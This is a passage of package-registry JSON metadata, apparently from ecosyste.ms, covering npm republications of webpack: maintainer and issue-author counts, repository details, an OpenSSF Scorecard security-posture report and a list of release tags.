ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":433,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_13_1/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_13_1/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_13_1/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_13_1/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_13_1/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fis-msprd-webpack_1_13_1/codemeta","maintainers":[{"uuid":"everthis","login":"everthis","name":null,"email":"wwwaap@gmail.com","url":null,"packages_count":68,"html_url":"https://www.npmjs.com/~everthis","role":null,"created_at":"2022-11-12T09:22:16.514Z","updated_at":"2022-11-12T09:22:16.514Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/everthis/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":4346680,"name":"@dulcetjs/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"dulcetjs","versions_count":4,"first_release_published_at":"2022-05-02T08:39:43.335Z","latest_release_published_at":"2022-05-04T10:11:47.515Z","latest_release_number":"3.5.2","last_synced_at":"2026-09-03T00:59:50.998Z","created_at":"2022-05-03T14:30:51.640Z","updated_at":"2026-09-03T00:59:50.999Z","registry_url":"https://www.npmjs.com/package/@dulcetjs/webpack","install_command":"npm install @dulcetjs/webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.5.2"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":n